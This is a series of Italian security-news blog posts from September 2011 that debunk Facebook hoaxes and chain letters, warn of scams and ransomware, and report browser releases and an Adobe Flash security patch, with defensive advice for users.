venerdì 30 settembre 2011

Malware Facebook: attenti agli amici accettati e ai messaggi ricevuti


Un nuova campagna malware e' in atto in queste ore su Facebook. Protezione Account ha individuato centinaia di profili falsi di ragazze, con immagine del profilo dai contorni sfuocati, che inviamo messaggi con link fraudolenti nella posta di Facebook a più persone. La truffa è ben congeniata: il fake richiede l'amicizia ad un profilo con un basso livello di privacy e poi accede alla lista amici dell'utente vittima. Da qui invia il messaggio ad un certo numero di amici del profilo caduto nella trappola.

Mozilla rilascia la versione 7 di Firefox, maggiore velocità e sicurezza


Mozilla ha rilasciato ufficialmente Forefox 7 per Windows, Mac e Linux. Mozilla Firefox, disponibile ora in più di 70 lingue, fornisce una veloce esperienza di navigazione web per gli utenti e nuovi strumenti per aiutare gli sviluppatori a creare velocemente siti e applicazioni web. "Firefox gestisce la memoria in modo più efficiente per offrire una agile esperienza di navigazione web. Gli utenti noteranno in Firefox più velocità ad aprire nuove schede, cliccando sulle voci di menu e i pulsanti sui siti web. Gli utenti di Internet potranno godere di prestazioni migliori quando molte schede sono aperte e durante le lunghe sessioni di Web browsing. 

I nuovi strumenti in Firefox rendono più facile agli sviluppatori la creazione di esperienze Web scattanti per gli utenti. Una nuova versione di Canvas accelera le animazioni in HTML 5 e i giochi in Firefox. Questo permette agli sviluppatori di creare esperienze Web più interessanti e interattivi come Angry Birds o Runfield", scrive Mozilla sul suo blog. Firefox 7 supporta la navigazione W3C e specifiche API Navigation Timing Specs per gli sviluppatori, in grado di misurare il tempo di caricamento della pagina e navigazione del sito contro la velocità di banda, traffico del sito web e altri fattori. Questa API consente agli sviluppatori di testare le esperienze degli utenti in remoto, in modo semplice e veloce, in modo da ottimizzare i siti web e applicazioni web per diversi tipi di utenti.


Ma la vera grande novità di Firefox 7 sta nei consumi di Ram che crollano anche del 20-50 per cento. Per contribuire a migliorare le future versioni di Firefox, gli utenti possono optare per la Telemetria . La telemetria è uno strumento costruito sui principi della privacy di Mozilla che consente di fornire alla società dati anonimi sulle prestazioni del browser degli utenti in modo privato e sicuro. Il gestore dei componenti aggiuntivi è stato rinnovato per cercare e installare i componenti aggiuntivi direttamente all'interno di Firefox. Firefox supporta i formati di font aperti come WOFF, TrueType e OpenType. Firefox impedisce a malintenzionati di intercettare dati sensibili utilizzando automaticamente una connessione sicura nel caso in cui i server permettano una connessione via HTTPS. In Windows, Firefox si integra perfettamente con il software antivirus. 

Quando si scarica un file, questo verrà verificato dal software antivirus presente sul computer in modo da proteggere da virus e altri tipi di malware che potrebbero altrimenti portare un attacco al computer. Se si desidera avere la completa sicurezza sulla legittimità di un sito prima di completare un acquisto, fare Fai clic sull'icona del sito (favicon) per visualizzare un riepilogo relativo all'identità del sito web. Bisogna proteggersi dai siti sospetti, evitare le contraffazioni web e assicurarsi che il sito che si sta visitando sia effettivamente quello che sostiene di essere. L'aggiornamento a Firefox 7 può essere effettuato dall'interno del browser o dalla pagina ufficiale di download.


giovedì 29 settembre 2011

Truffa Facebook: i profili non confermati saranno disattivati, soluzione


Dopo una pausa durata qualche mese, ritorna la truffa dei "profili Facebook non confermati saranno disattivati". Adesso siamo giunti all'ottantunesima versione. E' oramai da diversi anni che viene riproposta la medesima truffa sul social network attraverso pagine ed applicazioni. Le pagine e le applicazioni create col presunto motivo di confermare l'account Facebook sono tra le più popolari sul social network, migliaia di utenti esprimono la loro preferenza senza rendersene conto, credendo che si tratti di pagine e/o applicazioni ufficiali. La diffusione avviene in maniera "virale" per le caratteristiche peculiari del metodo utilizzato per diffondersi sul social network.

mercoledì 28 settembre 2011

Facebook traccia gli utenti anche dopo logout, smentita del network?


L’hacker Nic Cubrilovic ha pubblicamente accusato Facebook di tracciare le attività dei suoi utenti anche dopo l'effettuazione del "logout". Facebook ha definito questo "piccolo inconveniente" come un "bug", ma le numerose critiche ricevute hanno costretto il social network ha fornire delle spiegazioni più plausibili. Il ricercatore, dopo aver effettuato una serie di test analizzando le intestazioni delle richieste HTTP inviate dal browser web al dominio facebook.com, ha verificato come il social network alteri il contenuto dei suoi cookie nel momento in cui viene effettuato il logout dal servizio anziché provvedere ad una loro rimozione.

martedì 27 settembre 2011

Hoax/ tassa di adesione a Facebook: membro oro, argento e di bronzo


Stanno girando dei falsi messaggi su Facebook che avviserebbero dell'introduzione di una presunta "tassa" per i suoi utenti a causa delle imminenti modifiche al profilo. Ovviamente gli utenti più smaliziati non hanno mai creduto a queste voci e a queste iniziative. Facebook non chiederà mai di pagare per utilizzare il suo servizio. Eppure gli avvisi, in lingua inglese, che si stanno diffondendo a macchia d'olio nella posta degli utenti del social network o attraverso post sulle bacheche, sono giunti anche qui in Italia. I messaggi, completamente in lettere maiuscole, recitano testualmente:

lunedì 26 settembre 2011

Trend Micro individua attacco massiccio attraverso il malware Lurid


Trend Micro ha scoperto una serie continua di attacchi mirati, conosciuti come "LURID", che sono riusciti a compromettere 1.465 computer in 61 paesi diversi ed avverte di possibili attacchi anche in Italia. Trend Micro è stato in grado di individuare 47 vittime comprese le rappresentanze diplomatiche, ministeri, agenzie spaziali governative e altre aziende e istituti di ricerca. I paesi più colpiti da questo attacco sono Russia, Kazakistan e Vietnam, insieme a numerosi altri paesi - principalmente in CSI (Comunità degli Stati Indipendenti - o dell'ex Unione Sovietica).

domenica 25 settembre 2011

G Data scopre nuovo trojan per l'attivazione di un prodotto Windows


Gli specialisti dei laboratori G Data Software hanno individuato un nuovo programma cavallo di Troia ch estorce denaro agli utenti, utilizzando lo stile e il logo di Windows. Il malware chiede agli utenti di pagare una tassa di 100 euro per riattivare il computer. Il nuovo ransomware colpisce gli utenti di di Microsoft Windows che possiedono un licenza copia / trial. In caso di infezione, il pc viene bloccato e reso inutilizzabile. Gli esperti raccomandano di non trasferire denaro in nessun caso, non immettere dati personali o numeri della licenza ufficiale per Windows. Il malware visualizza una schermata con una falsa richiesta di attivazione di Microsoft Windows:

Kaspersky Lab presenta la classifica malware relativa ad agosto 2011


Per l'industria della sicurezza informatica, agosto è tradizionalmente uno dei mesi più caldi, nonostante sia il periodo delle vacanze estive. In agosto negli Stati Uniti si tengono due delle più importanti conferenze nel settore della sicurezza: BlackHat e Defcon. Nell'ambito di queste conferenze emergono i nuovi metodi con cui si conducono gli attacchi e diverse tecnologie di cracking, alcune delle quali purtroppo trovano successivamente applicazione anche nei programmi malevoli.

sabato 24 settembre 2011

Bufala: criminali fanno vittime con falsi bambini in auto e lancio di uova


Nonostante le numerose smentite in Rete, continua a girare una bufala su Facebook che se prima veniva propagata attraverso messaggi in posta e note, adesso viene diffusa anche attraverso aggiornamenti di status (dopo che Facebook ha portato lo status a 5.000 caratteri). L'appello riguarda presunti "metodi escogitati da Rom e ladri perchè gli automobilisti (soprattutto donne) fermino il proprio veicolo e ne scendano (in zone isolate)", diventando in questo modo potenziali vittime di criminali. Il messaggio bufala (al quale cadono come sempre utenti poco "informati" e molto "creduloni") e spesso usato da pagine per incrementare l'interazione degli utenti sulla pagina stessa, recita testualmente:

"Una sera, mentre percorrevo una via secondaria per tornare a casa, ho notato, sul seggiolino di un'auto ferma a bordo della strada, un bambino coperto da un panno. Non so spiegare perchè - e la ragione poco importa - ma non mi sono fermata... Quando sono arrivata a casa, ho telefonato alla polizia che mi ha assicurato che sarebbe andata a vedere Nel contempo, però, ecco quello di cui la polizia mi ha informata: le bande di malviventi, i Rom e i ladri stanno escogitando vari stratagemmi perchè gli automobilisti (soprattutto donne) fermino il proprio veicolo e ne scendano (in zone isolate). Il metodo praticato da certe bande consiste nel posizionare una macchina lungo la strada con un falso bebè seduto dentro, aspettando che una donna si fermi per andare a vedere quello che lei crede essere un bimbo abbandonato. Da notare che la macchina è solitamente messa vicino a un bosco e ad un campo con l'erba alta: la persona che ha la malaugurata idea di fermarsi sarà trascinata nel bosco, violentata, picchiata e derubata... Non fermatevi mai, ma chiamate il 113 appena possibile, raccontando quello che avete visto e dove l'avete visto, MA CONTINUATE LA VOSTRA STRADA! Altro espediente: Se, mentre state guidando, vi 'arrivano' delle uova sul parabrezza, non fermatevi, ma soprattutto non azionate il lavavetri, perchè le uova miste all'acqua diventano collose e vi oscurerebbero il parabrezza fino a più del 90%! Sareste allora costretti a fermarvi al bordo della strada, diventando potenziali vittime di criminali. Ecco qualcuna delle nuove tecniche utilizzate dalle bande di criminali. Informate i vostri amici, per favore..."
In realtà l'appello ha una "straordinaria" somiglianza con una bufala che circola sin dal 2009 negli Stati Uniti, segnalata da Urban Legends e smentito dalle forze di polizia. Come fà notare Paolo Attivissimo, si tratta di una storia inventata all'estero (come quella che abbiamo precedentemente segnalato) e riadattata da mano ignota introducendo dettagli locali (113) e un pizzico di razzismo (i Rom, assenti nell'appello americano):
"New Warnings FYI, passed along from personnel at the Paulding County Courthouse, in Georgia. Several things to be aware of this year... as gangs and robbers are now plotting different ways to get a person to "stop" their vehicle. Please note: There is a gang initiation reported by the local police department that gangs are placing a car seat by the road ... with a fake baby in it... waiting for a woman, of course, to stop and check on the baby. Note that the location of this car seat will usually be beside a wooded or grassy (field) area ...and the person - woman - will be dragged into the woods - beaten and raped - usually left for dead. DO NOT STOP. DIAL 9-1-1 AND INFORM THEM... IF YOU ARE DRIVING AT NIGHT AND EGGS ARE THROWN AT YOUR WINDSHIELD. DO NOT OPERATE THE WIPER AND SPRAY ANY WATER BECAUSE EGGS MIXED WITH WATER BECOME MILKY AND BLOCK YOUR VISION UP TO 92.5% SO YOU ARE FORCED TO STOP BESIDE THE ROAD AND BECOME A VICTIM OF ROBBERS. THIS IS A NEW TECHNIQUE USED BY ROBBERS. PLEASE INFORM YOUR FRIENDS AND RELATIVES."

Secondo Beingstuart.com si tratta della classica bufala, in quanto sono assenti luoghi o date che permettano di circostanziare gli eventi descritti, inoltre non vi sono evidenze che le tecniche di cui si è fatta menzione siano state mai effettivamente utilizzate per aggredire o derubare qualcuno. La prima parte dell'appello, quella che parla dei finti bambini esca, è alquanto inverosimile: come farebbe un automobilista, mentre passa, a notare un bambino coperto da un panno dentro un'auto ferma sul ciglio della strada?  Ed ancora, come fà notare Snopes.com, riguardo alla seconda parte dell'appello, le uova miste all'acqua non diventano affatto collose e vengono facilmente rimosse dai tergicristalli. Insomma, prima di diffondere qualsiasi appello via e-mail o sui social network, fate una semplice ricerca in Rete ed eviterete di essere "inconsapevoli complici" di qualche furbacchione.

Facebook archivierà i gruppi nel vecchio formato, come aggiornare


Facebook ha deciso di archiviare nei prossimi mesi tutti i gruppi creati con il vecchio formato. Quando il gruppo viene archiviato, i post presenti sulla bacheca, le foto e le discussioni passeranno automaticamente al nuovo formato dei gruppi, ma i membri del gruppo dovranno essere aggiunti nuovamente. Quando i vecchi gruppi vengono archiviati, vengono convertiti nel nuovo formato. Quasi tutti gli elementi del vecchio gruppo saranno disponibili nel gruppo archiviato, tranne alcune eccezioni.

Elementi che saranno disponibili nella versione archiviata:
  • Le immagini del gruppo e i post in bacheca
  • Le discussioni del gruppo, che diventano post in bacheca
  • La descrizione del gruppo, visibile nella parte superiore della pagina cliccando su "Mostra tutti" nel nuovo gruppo
Elementi che NON saranno disponibili nella versione archiviata:
  • Notizie recenti
  • Titoli degli incaricati del gruppo
  • La casella informativa che appare sotto l'immagine del vecchio gruppo
  • La rete del gruppo
  • I membri del vecchio gruppo 
È ancora possibile aggiungere nuovi membri cliccando su "Aggiungi amici al gruppo".

Come aggiornare un vecchio gruppo a uno nuovo?
Se il livello di attività del vostro vecchio gruppo è sufficiente per renderlo un buon candidato per l'aggiornamento a nuovo gruppo, verrà visualizzato un messaggio nella parte superiore della pagina del gruppo contenente l'opzione di aggiornamento. I membri del gruppo vedranno l'opzione per chiedere l'aggiornamento all'amministratore. Se siete un amministratore, cliccate su "Aggiorna questo gruppo" per aggiornare al nuovo formato gruppi. Tenete presente che la conversione del gruppo al nuovo formato può impiegare alcuni minuti.

Se decidete di non aggiornare il vostro gruppo o non vedete l'opzione che vi chiede di farlo, il gruppo verrà archiviato. Potete continuare a utilizzare il gruppo anche dopo l'archiviazione. Tuttavia, dato che i membri dei vecchi gruppi non vengono trasferiti ai gruppi archiviati, dovrete aggiungere nuovi membri. Ricordate che il formato dei nuovi gruppi è stato concepito per aiutarvi a condividere contenuti con piccoli gruppi di persone. Se utilizzavate il vostro vecchio gruppo per promuovere la vostra azienda, Facebook consiglia di creare una Pagina. Maggiori informazioni sulle differenze tra gruppi e Pagine.


Cosa succede quando un amministratore aggiorna un vecchio gruppo?
Se l'amministratore di un vecchio gruppo decide di aggiornarlo, il gruppo verrà convertito al nuovo formato gruppi. Se l'amministratore sceglie di non aggiornare, il gruppo verrà archiviato. Quasi tutti gli elementi del vecchio gruppo saranno disponibili nel gruppo aggiornato, tranne alcune eccezioni.

Elementi che saranno disponibili nel nuovo gruppo:
  • Le immagini del gruppo e i post in bacheca
  • Le discussioni del gruppo, che diventano post in bacheca
  • La descrizione del gruppo, visibile nella parte superiore della pagina cliccando su "Mostra tutti" nel nuovo gruppo
  • I membri del vecchio gruppo verranno migrati al nuovo gruppo
Elementi che NON saranno disponibili nel nuovo gruppo:
  • Notizie recenti
  • Titoli degli incaricati del gruppo
  • La casella informativa che appare sotto l'immagine del vecchio gruppo
  • La rete del gruppo
Una volta aggiornato il gruppo, i membri possono:
I membri ricevono automaticamente le notifiche relative ai post nel nuovo gruppo. Le impostazioni delle notifiche possono essere modificate facilmente cliccando sul pulsante "Modifica impostazioni".


Come si fà ad aggiungere nuovi membri a un gruppo?
Per aggiungere membri a un gruppo, accedete al gruppo e cliccate su "Aggiungi amici al gruppo" nella colonna di destra. Da qui, potrete digitare i nomi dei vostri amici per aggiungerli al gruppo. I membri possono aggiungere i propri amici per tutti i tipi di gruppi (aperti, chiusi e segreti). Le altre persone possono inviare una richiesta per iscriversi a un gruppo aperto o chiuso, che dovrà essere confermata dall'amministratore. Per maggiori informazioni visitate questa pagina del Centro Assistenza di Facebook.

venerdì 23 settembre 2011

Bufala su Facebook: virus attraverso mail intitolata "Qui il gioco è fatto"


Un nuovo messaggio bufala sta facendo il giro tra gli utenti di Facebook ed avvertirebbe su un presunto virus trasmesso attraverso il file allegato in una mail "apparentemente innocua". Il messaggio, scritto con una sintassi alquanto strana, citerebbe fonti autorevoli (tra i quali Microsoft e Norton) che confermerebbero la gravità della notizia, in quanto il virus sarebbe in grado di distruggere tutto ciò che è contenuto nell'hard disk e sarebbe in grado di rubare i dati personali in esso contenuti. La mail recita testualmente:

"ATTENZIONE: Chiunque, mediante posta elettronica Internet come Yahoo, Hotmail, AOL e così via. Questa informazione è arrivata oggi, diretto da Microsoft e Norton. Si prega di inviare a tutti di sapere chi ha accesso a Internet. Potresti ricevere un apparentemente innocua e-mail dal titolo "Qui il gioco è fatto". Se si apre il file, apparirà un messaggio sullo schermo dicendo: 'E' troppo tardi, la tua vita non è più bello, f *** te e morire ....' Successivamente si perderà tutto nel vostro PC. E chi l'ha mandato a voi avrà accesso al tuo nome, indirizzo e-mail e password, ecc Questo è un nuovo virus che ha iniziato a circolare nel pomeriggio di Sabato. AOL ha già confermato la gravità, e il software antivirus non sono in grado di distruggerlo. ... Il virus è stato creato da un hacker che si autodefinisce 'proprietario vita'. SI PREGA DI INVIARE UNA COPIA DI QUESTA E-MAIL A TUTTI I VOSTRI AMICI, e chiedere loro di trasmetterlo IMMEDIATAMENTE"


Il messaggio può essere trasmesso anche attraverso lo status, in quanto è proprio di queste ore l'aggiornamento di Facebook che permette di scrivere messaggi di stato non vincolati più ai "canonici" 500 caratteri, bensì fino a 5000.


In realtà si tratta d'una mail bufala tradotta dall'inglese (ecco perchè risulta strana la sintassi) circolante sin dal 2008, come riporta il sito Urban Legends:

"Subject: Fwd: Major Virus Warning

Anyone-using Internet mail such as Yahoo, Hotmail, AOL and so on.

This information arrived this morning, Direct from both Microsoft and Norton. Please send it to everybody you know who has access to the Internet.

You may receive an apparently harmless e-mail titled 'Mail Server Report'

If you open either file, a message will appear on your screen saying: 'It is too late now, your life is no longer beautiful.'

Subsequently you will LOSE EVERYTHING IN YOUR PC, And the person who sent it to you will gain access to your name, e-mail and password.

This is a new virus which started to circulate on Saturday afternoon. AOL has already confirmed the severity, and the anti virus software's are not capable of destroying it."

Quest'ultima, a sua volta, è la variante di una mail che girava nel 2006 e che recitava testualmente:

"Subject: virus warning, please tell your friends

This one checks out and is a bona fide real virus so hence the warning.

Any email with "Mail Server Report" in the subject line is a new virus and should not be opened. It comes with an attachment in zip format. Apparently there is a Zip file attached so be very weary of any thing with a zip file on it.
The message tells you that a worm was detected in an e-mail that you sent out and asks you to open and install the attachment to fix the problem. Only, it IS the problem! DO NOT DO IT! Delete the e-mail.
This is a real threat".

Secondo quanto verificato dagli esperti di antivirus a partire dal settembre 2006, un worm Internet soprannominato "Stration" (noto anche come "Warezov") è a piede libero e si propaga tramite messaggi di posta in una varietà di intestazioni incluso "Mail Server Report" (altri intestazioni tipiche includono "Error", "Good Day" e "ciao").

Il file infetto, che può arrivare come allegato. Zip,. Scr, o. Exe, pretende di essere un "aggiornamento per l'eliminazione di worm", ma in realtà contiene il worm stesso. Se il file viene aperto, il worm si auto-installa sul computer dell'utente e inizia a inviare copie di se stesso agli indirizzi trovati sul disco fisso del personal computer. Ma la variante di allerta del 2008 e l'attuale che Protezione Account ha segnalato è una bufala. In ogni caso è altrettanta falsa l'affermazione che il software antivirus non è in grado di distruggere questo worm (sarebbe corretto usare il termine "bloccarlo"), in quanto tutti gli antivirus aggiornati contengono le firme di questo virus. Collegandovi a questa pagina di McAfee, potete visualizzare la diffusione del Worm. In ogni caso è buona pratica evitare di aprire allegati sospetti o non familiari nelle e-mail, e allo stesso modo non diffondere falsi avvisi allarmistici privi di qualsiasi fondamento tecnico.

Facebook, Timeline per raccontare la propria vita e nuovo Open Graph


Dopo le modifiche ai profili personali degli utenti implementate di recente, Facebook ha presentato Timeline e una serie di nuove applicazioni compatibili con il social network. L'occasione per comunicare al mondo queste novità è stata la conferenza F8, in cui lo stesso Mark Zuckerberg ha spiegato come cambierà il sito oggi popolato da 750 milioni di utenti. Accompagnato dal comico Andy Samberg che lo impersona nello show 'Saturday Night Live', il fondatore e amministratore delegato del social network Mark Zuckerberg ha dato il via alla conferenza degli sviluppatori F8 mostrando ai presenti il nuovo servizio del colosso di Palo Alto.


Timeline modifica ulteriormente la pagina personale dell'utente trasformandola in una specie di rivista, sfogliabile come le app disponibili per iPad. Secondo il Ceo, il nuovo servizio contiene "la vita degli utenti" - ovvero, foto, storie, e altri contenuti capaci di raccontare anche il passato delle persone. Si tratta di un'interfaccia che permetterà di impaginare tutte le risorse condivise su Facebook secondo una linea temporale."Pensiamo sia estremamente importante che il prossimo passo sia quello di raccontare la propria vita", ha spiegato Zuckerberg che ha sottolineato come gli utenti abbiano comunque un controllo totale di cio' che appare sulle proprie 'Timeline'.



Timeline permette di navigare a ritroso nel tempo le proprie foto, le proprie condivisioni, i luoghi in cui si è stati, la musica ascoltata e altre informazioni. È la storia della propria vita pubblicata in un social network, potenziata da un motore di ricerca e da un nuovo design molto più pulito e navigabile. In cima alla Timeline di ciascuno sovrasterà una grande immagine, la “copertina”, che dovrebbe rappresentare, più di mille parole, carattere e spirito della persona in questione. Subito sotto, i contenuti, immagini, video e applicazioni in primo piano. Anche qui con parecchie novità, anche se chi utilizza la versione inglese del sito ha potuto provarli in anteprima.


Le “notizie più recenti” non saranno più confinate in una scheda a parte, come accade oggi, ma raggruppate in un “ticker”, un piccolo riquadro che si aggiorna da solo in continuazione, simile a quello presente su Twitter che annuncia l'arrivo di nuovi messaggi. Le applicazioni inoltre non saranno esenti dal restyling, con il lancio di una nuova versione della piattaforma di programmazione Open Graph e di un nuovo genere di app, dedicate a condividere con gli amici le cosiddette “lightweight activities”: ovvero la musica che si sta ascoltando con Spotify, la tv che si sta guardando con TvDream, il cibo che si sta mangiando attraverso Foodspotting.


Zuckerberg ha poi presentato alcune nuove app musicali cedendo la parola a Daniel Ek, amministratore delegato di Spotify. Per Ek, la possibilita' di scoprire musica dal social network dovrebbe "aumentare l'ascolto da parte degli utenti e aumentare le probabilita' che questi paghino per i contenuti".  Il social network può abilitare il pagamento anche attraverso la sua moneta digitale, i "credits". iHeartRadio, Rhapsody e turntable.fm sono tra i siti musicali che creano app per Facebook. Riprende poi la parola il Ceo di Facebook che presenta nuove app per contenuti video prodotte dalla televisione online Hulu e Netflix.



"Siamo entusiasmati da tutte queste nuove app e dalle possibilita' sociali di Netflix", ha detto l'ad Reed. Tra le altre novità si possono poi segnalare la rimozione del limite di 500 caratteri negli aggiornamenti di stato che adesso è passato a cinquemila caratteri. Nel rinnovo grafico di Facebook, tra tante novità, c'è anche lo spostamento della pulsante poke, che ha da sempre caratterizzato il social network ma dall'utilità non troppo chiara, viene adesso relegato in un menù a tendina dentro le pagine dei profili. Sono previsti cambiamenti per i giochi in modo da arricchire l'offerta, coinvolgendo gli sviluppatori software. In tutto questo, si spera venga migliorata la sicurezza della piattaforma.

giovedì 22 settembre 2011

Adobe Flash rilascia aggiornamenti per tappare vulnerabilità critiche


Adobe ha appena rilasciato un aggiornamento (APSB11-26) per il suo software Flash onnipresente, arrivando così alla versione 10.3.183.10 per Windows, Mac, Solaris e Linux, e alla versione 10.3.186.7 per Android. Il rilascio corregge sei vulnerabilità in Flash Player, una delle quali è stata usata in attacchi mirati. Questo bug è una falla cross-site scripting che potrebbe consentire a pagine Web malintenzionate di intraprendere azioni per conto dell'utente connesso. Adobe ha valutato questo aggiornamento come critico. Vulnerabilità Critiche sono state identificate in Adobe Flash Player 10.3.183.7 e versioni precedenti per Windows, Macintosh, Linux e Solaris, e Adobe Flash Player 10.3.186.6 e versioni precedenti per Android. Queste vulnerabilità possono causare un crash e consentire ad eventuali attacker di prendere il controllo del sistema interessato.

Ci sono rapporti che una di queste vulnerabilità (CVE-2011-2444) viene sfruttata in attacchi mirati progettati per ingannare l'utente a cliccare su un link maligno consegnato in un messaggio di posta elettronica. Questa universale cross-site scripting potrebbe essere utilizzata per intraprendere azioni per conto di un utente su qualsiasi sito web o il fornitore di webmail se l'utente visita un sito web malevolo. Adobe consiglia agli utenti di Adobe Flash Player 10.3.183.7 e versioni precedenti per Windows, Macintosh, Linux e Solaris l'aggiornamento ad Adobe Flash Player 10.3.183.10. Gli utenti di Adobe Flash Player per Android 10.3.186.6 e versioni precedenti dovrebbero aggiornare ad Adobe Flash Player per Android 10.3.186.7.

VERSIONI DEL SOFTWARE INTERESSATE
  • Adobe Flash Player 10.3.183.7 e versioni precedenti per Windows, Macintosh, Linux e sistemi operativi Solaris
  • Adobe Flash Player 10.3.186.6 e versioni precedenti per Android
(Nota: Il componente authplay.dll fornito con Adobe Reader e Acrobat X (10.1.1) e versioni precedenti 9.xe 10.x e per sistemi operativi Windows e Macintosh non è colpito dalla CVE-2011-2444)


Per verificare la versione di Adobe Flash Player installata sul proprio sistema, accedere alla pagina Informazioni su Flash Player, oppure fare clic destro sul contenuto eseguito in Flash Player e selezionare "Informazioni su Adobe (o Macromedia) Flash Player" dal menu. Se si utilizzate più browser, eseguire la verifica per ogni browser installato sul sistema. Per verificare la versione di Adobe Flash Player per Android, andare su Impostazioni> Applicazioni> Gestione Applicazioni> Adobe Flash Player 10.x. Chrome si aggiorna automaticamente quando una nuova versione di Flash Player è disponibile, per proteggere gli utenti con gli ultimi aggiornamenti di sicurezza.

SOLUZIONE

Adobe consiglia a tutti gli utenti di Adobe Flash Player 10.3.183.7 e versioni precedenti per Windows, Macintosh, Linux e Solaris l'aggiornamento alla versione più recente 10.3.183.10 scaricandolo dall'Adobe Flash Player Download Center . Gli utenti Windows e gli utenti di Adobe Flash Player 10.3.183.7 o versione successiva per Macintosh possibile installare l'aggiornamento attraverso il meccanismo di aggiornamento automatico integrato nel prodotto quando viene richiesto. Gli utenti di Adobe Flash Player per Android 10.3.186.6 e versioni precedenti dovrebbero aggiornamento ad Adobe Flash Player per Android 10.3.186.7 visitando il sito del Marketplace di Android su un telefono Android.

DETTAGLI
  1. Questo aggiornamento risolve un problema di overflow dello stack AVM che può consentire l'esecuzione di codice remoto (CVE-2011-2426).
  2. Questo aggiornamento risolve un problema di overflow dello stack AVM che può portare al denial of service e l'esecuzione di codice (CVE-2011-2427).
  3. Questo aggiornamento risolve un problema di errore logico che causa un crash del browser e può portare all'esecuzione di codice (CVE-2011-2428).
  4. Questo aggiornamento risolve un controllo di sicurezza in Flash Player che viene bypassato e potrebbe consentire l'intercettazione di informazioni. (CVE-2011-2429).
  5. Questo aggiornamento risolve una vulnerabilità in streaming media logic error che potrebbe portare all'esecuzione di codice (CVE-2011-2430).
Gli utenti di Chrome utenti sono stati automaticamente aggiornati il 20 settembre 2011 con la protezione contro questi difetti.

mercoledì 21 settembre 2011

Link spam su Facebook inviati da amici, come proteggere l'account


"Ciao, come stai? ma dimmi sei proprio tu in questo video?": era uno dei messaggi che nelle ultime ore è dilagato su Facebook, associato al nome del profilo che lo inviava. La trappola era costruita con furbizia: in alcuni casi erano leggibili dei commenti ulteriori del tipo: "Questa ragazza doveva essere pazza per averlo fatto". Ma la curiosità, come spesso accade, spingeva verso un trappola gli utenti del social network che cliccavano su una finta anteprima di YouTube, e con la scusa che bisognava procedere ad un "controllo di sicurezza", l'utente veniva invitato a premere alcuni tasti in sequenza che nascondevano istruzioni automatizzate. 

Adesso il sistema antispam automatico di Facebook, sembra abbia rimosso tutte le false miniature dalle bacheche dei profili ed inoltre il server su cui risiedeva la truffa appare disattivato. In ogni caso è bene conoscere come difendersi da queste tipologie di truffe che Protezione Account ha battezzato col termine "Javasticking", in modo da prevenire ulteriori scam. Come leggiamo presso il Centro Assistenza di Facebook, nella sezione dedicata alla protezione dell'account: "Uno scam contenente uno script dannoso ti chiede di copiare e incollare del testo nella barra degli indirizzi del browser per visualizzare un contenuto interessante o sorprendente (es.: chi ha visualizzato il tuo profilo)".


Nel tempo di attesa che segue la digitazione (dopo aver copi/incollato il codice javascript attraverso la combinazione dei tasti CTRL + V), il profilo compie una serie di azioni come se fosse l'utente ad effettuarle. Questo "codice" è in realtà uno script dannoso. Invece di mostrare ciò che viene pubblicizzato, il vostro account viene utilizzato ad esempio per creare eventi, autopubblicando lo stesso post nella propria bacheca e in quelle degli amici o inviando spam ai vostri amici attraverso messaggi di posta o in chat. Gli autori di spam spesso pubblicizzano contenuti sorprendenti per attirare gli utenti nelle loro trappole. I consigli sono quelli di  non cliccare mai su link sospetti anche se vi vengono inviati dagli amici. Non copiare e incollare del testo nella barra degli indirizzi del vostro browser Internet se non siete sicuri del contenuto effettivo.

Cosa potete fare per proteggere il vostro account?
  1. Pensateci bene prima di cliccare su un link. 
  2. Non cliccare mai su link sospetti, anche se provengono da un amico o da un'azienda che conoscete. Ciò include i link inviati su Facebook (es.: in una chat o post in bacheca) e i link inviati via e-mail. 
  3. Se uno dei vostri amici clicca inavvertitamente su un link contenente spam, tale link potrebbe essere inviato a tutti i suoi amici di Facebook. 
  4. Ricordate di non reinserire mai la vostra password di Facebook né di scaricare alcunché (es.: un file ".exe") se non siete sicuri di cosa si tratti. Maggiori informazioni su come riconoscere link sospetti e e-mail sospette.
  5. Se non siete sicuri dell'indirizzo che ricevete, non incollarlo nella barra dell'indirizzo del browser Internet. Incollare un testo sconosciuto nella barra dell'indirizzo può comportare la creazione di eventi e pagine dal vostro account o di altre azioni spam. 
  6. Aggiornate il vostro browser di navigazione.
  7. Accedete su www.facebook.com. Talvolta, gli autori di scam creano una pagina falsa del tutto simile alla pagina di accesso di Facebook nella speranza che voi immettiate qui il vostro indirizzo e-mail e la vostra password. 
  8. Assicuratevi di verificare l'URL della pagina (indirizzo Web) prima di immettere le vostre informazioni di accesso. Se avete dei dubbi, potete sempre digitare "facebook.com" nel vostro browser per tornare al vero sito di Facebook.
  9. Create una password unica e complessa: Usate combinazioni di almeno sei lettere, numeri e segni di punteggiatura; non utilizzare parole che possono essere trovate nel dizionario. Potete reimpostare la password accedendo alla pagina Impostazioni account dal menu a discesa Account visualizzato nella parte superiore di qualsiasi pagina di Facebook.
  10. Eseguite un software antivirus per proteggervi da virus e malware. Per maggiori informazioni e per scaricare gratuitamente questo software, visitate questa pagina per Windows e questa per Mac OS.

Per maggiori informazioni su come proteggere il vostro account, visitate la sezione Protezione del Centro assistenza di Facebook.

Il profilo di un vostro amico invia link contenenti spam o crea eventi e pagine spam.
  • È possibile che il vostro amico abbia incollato uno script dannoso nella propria barra degli indirizzi. Tali azioni si possono interrompere chiudendo la finestra del browser o uscendo da Facebook. A coloro che inconsapevolmente hanno eseguito la procedura consigliamo in ogni caso, per maggior sicurezza, il cambio della propria password. 
  • Se il vostro amico non ha incollato alcun testo nel browser, sul suo computer potrebbe essere stato scaricato un software dannoso oppure è possibile che le sue informazioni di accesso siano state oggetto di un'azione di phishing. Dite al tuo amico di visitare la sezione Phishing e malware del Centro assistenza per proteggere il proprio account. 
  • Non cliccare mai su link sospetti, anche se provengono da un amico o da un'azienda che conoscete. Se avete ricevuto uno strano messaggio in bacheca o un messaggio da un amico che vi chiede di cliccare su un link oppure dal vostro account sono stati inviati dei link ma non siete stati voi a farlo, potete segnalare il link. Per salvaguardare la sicurezza del vostro account e del computer, fate attenzione a non cliccare sul link quando lo evidenziate e lo copiate.

martedì 20 settembre 2011

Disponibile Google Chrome 14, maggiore velocità e supporto Web audio


L'ultima versione stabile di Google Chrome, giunta alla 14 e disponibile per tutte le piattaforme, ha portato con se delle novità, oltre ai consueti aggiornamenti in termini di performance e sicurezza, per risolvere i problemi segnalati da utenti e sviluppatori. Ad un mese dall’ultima release Beta, Chrome 14.0.835.163, presenta due nuove funzionalità dedicate agli sviluppatori ed è inoltre compatibile con la nuova versione del sistema operativo Lion Mac OS X 10.7.

